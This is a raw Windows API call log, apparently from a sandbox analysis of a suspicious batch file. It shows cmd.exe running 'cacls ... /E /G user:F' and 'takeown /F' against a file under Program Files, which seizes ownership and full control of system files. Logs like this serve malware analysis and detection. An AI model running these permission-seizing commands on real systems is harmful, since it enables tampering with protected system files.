0x3 [0214.044] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0214.044] GetLastError () returned 0x2 [0214.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.044] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0214.044] GetLastError () returned 0x2 [0214.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0x430b68 [0214.044] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0214.044] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0xffffffff [0214.045] GetLastError () returned 0x2 [0214.045] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec48) returned 0x430b68 [0214.045] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0214.045] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.045] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.045] GetConsoleTitleW (in: lpConsoleTitle=0x24ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.056] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0214.056] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0214.056] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0214.056] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0214.056] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0214.056] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0214.056] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0214.056] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0214.056] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0214.056] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0214.057] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0214.057] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0214.057] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0214.057] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0214.057] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0214.057] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0214.057] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0214.057] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0214.057] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0214.057] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0214.057] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0214.057] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0214.057] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0214.057] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0214.057] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0214.057] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0214.057] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0214.057] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0214.057] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0214.057] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0214.057] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0214.057] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0214.057] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0214.057] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0214.057] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0214.057] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0214.057] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0214.057] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0214.058] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0214.058] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0214.058] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0214.058] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0214.058] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0214.058] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0214.058] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0214.058] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0214.058] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0214.058] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0214.058] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0214.058] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0214.058] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0214.071] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0214.071] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0214.071] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0214.071] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0214.071] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0214.071] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0214.071] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0214.071] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0214.071] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0214.071] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0214.071] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0214.071] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0214.071] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0214.071] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0214.072] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0214.072] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0214.072] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0214.072] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0214.072] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0214.072] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0214.072] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0214.072] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0214.072] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0214.072] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0214.072] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0214.072] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0214.072] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0214.072] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0214.072] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0214.072] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0214.073] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0214.073] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0214.073] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0214.073] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0214.073] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0214.073] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0214.073] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0214.073] SetErrorMode (uMode=0x0) returned 0x0 [0214.073] SetErrorMode (uMode=0x1) returned 0x0 [0214.073] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x43c508, lpFilePart=0x24e79c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x24e79c*="Desktop") returned 0x1d [0214.073] SetErrorMode (uMode=0x0) returned 0x1 [0214.073] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0214.073] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.073] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.073] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0214.074] GetLastError () returned 0x2 [0214.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.074] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0214.074] GetLastError () returned 0x2 [0214.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0214.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0x430b68 [0214.074] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0214.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0xffffffff [0214.075] GetLastError () returned 0x2 [0214.075] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24e528, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e528) returned 0x430b68 [0214.075] FindClose (in: hFindFile=0x430b68 | out: hFindFile=0x430b68) returned 1 [0214.075] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.075] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.075] GetConsoleTitleW (in: lpConsoleTitle=0x24ea1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.262] InitializeProcThreadAttributeList (in: lpAttributeList=0x24e948, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24e92c | out: lpAttributeList=0x24e948, lpSize=0x24e92c) returned 1 [0215.262] UpdateProcThreadAttribute (in: lpAttributeList=0x24e948, dwFlags=0x0, Attribute=0x60001, lpValue=0x24e934, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24e948, lpPreviousValue=0x0) returned 1 [0215.262] GetStartupInfoW (in: lpStartupInfo=0x24e980 | out: lpStartupInfo=0x24e980*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.262] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.263] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.263] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.263] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.264] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x24e8d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24e91c | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x24e91c*(hProcess=0xb8, hThread=0xb0, dwProcessId=0x968, dwThreadId=0x994)) returned 1 [0215.271] CloseHandle (hObject=0xb0) returned 1 [0215.271] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.271] GetEnvironmentStringsW () returned 0x439df0* [0215.271] FreeEnvironmentStringsA (penv="=") returned 1 [0215.271] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0216.630] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x24e8b4 | out: lpExitCode=0x24e8b4*=0x0) returned 1 [0216.631] CloseHandle (hObject=0xb8) returned 1 [0216.631] _vsnwprintf (in: _Buffer=0x24e99c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24e8bc | out: _Buffer="00000000") returned 8 [0216.631] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0216.631] GetEnvironmentStringsW () returned 0x43e300* [0216.631] FreeEnvironmentStringsA (penv="=") returned 1 [0216.631] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0216.631] GetEnvironmentStringsW () returned 0x43e300* [0216.631] FreeEnvironmentStringsA (penv="=") returned 1 [0216.631] DeleteProcThreadAttributeList (in: lpAttributeList=0x24e948 | out: lpAttributeList=0x24e948) [0216.631] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.631] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0216.631] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.631] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0216.631] _get_osfhandle (_FileHandle=0) returned 0x38 [0216.631] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0216.632] SetConsoleInputExeNameW () returned 0x1 [0216.632] GetConsoleOutputCP () returned 0x1b5 [0216.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0216.632] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.632] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f0dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0216.632] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0216.632] _get_osfhandle (_FileHandle=3) returned 0xb8 [0216.632] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0216.633] _get_osfhandle (_FileHandle=3) returned 0xb8 [0216.633] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0216.633] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f0ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x24f0ac*=0xc2, lpOverlapped=0x0) returned 1 [0216.633] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0216.633] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0216.633] _get_osfhandle (_FileHandle=3) returned 0xb8 [0216.633] GetFileType (hFile=0xb8) returned 0x1 [0216.633] _get_osfhandle (_FileHandle=3) returned 0xb8 [0216.633] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0216.633] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0216.633] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0216.633] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0216.633] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0216.633] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0216.633] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0216.633] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0216.634] _tell (_FileHandle=3) returned 47 [0216.634] _close (_FileHandle=3) returned 0 [0216.634] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24ee70 | out: _Buffer="\r\n") returned 2 [0216.634] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.634] GetFileType (hFile=0x3c) returned 0x2 [0216.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0216.634] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee48 | out: lpMode=0x24ee48) returned 1 [0216.635] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.635] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24ee60, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24ee60*=0x2) returned 1 [0216.635] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0216.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0216.635] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24ee6c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0216.635] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x24ee6c | out: _Buffer=">") returned 1 [0216.635] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.635] GetFileType (hFile=0x3c) returned 0x2 [0216.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0216.635] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24ee4c | out: lpMode=0x24ee4c) returned 1 [0216.635] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.635] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24ee64, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x24ee64*=0x1e) returned 1 [0216.635] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.635] GetFileType (hFile=0x3c) returned 0x2 [0216.635] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0216.636] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0ec | out: lpMode=0x24f0ec) returned 1 [0216.636] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.636] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x437730*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x24f104, lpReserved=0x0 | out: lpBuffer=0x437730*, lpNumberOfCharsWritten=0x24f104*=0x7) returned 1 [0216.636] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f10c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" ") returned 60 [0216.636] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.636] GetFileType (hFile=0x3c) returned 0x2 [0216.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0216.636] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0e4 | out: lpMode=0x24f0e4) returned 1 [0216.636] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.636] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0x24f0fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f0fc*=0x3c) returned 1 [0216.638] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f120 | out: _Buffer="\r\n") returned 2 [0216.638] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.638] GetFileType (hFile=0x3c) returned 0x2 [0216.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0216.638] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x24f0f8 | out: lpMode=0x24f0f8) returned 1 [0216.638] _get_osfhandle (_FileHandle=1) returned 0x3c [0216.638] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f110, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x24f110*=0x2) returned 1 [0216.639] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0216.639] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0216.639] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0216.639] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0216.639] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0216.639] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0216.639] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0216.639] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0216.639] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0216.639] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0216.639] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0216.639] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0216.639] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0216.639] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0216.639] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0216.639] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0216.639] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0216.639] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0216.639] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0216.639] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0216.639] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0216.639] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0216.639] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0216.639] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0216.639] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0216.639] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0216.639] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0216.639] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0216.639] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0216.639] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0216.639] 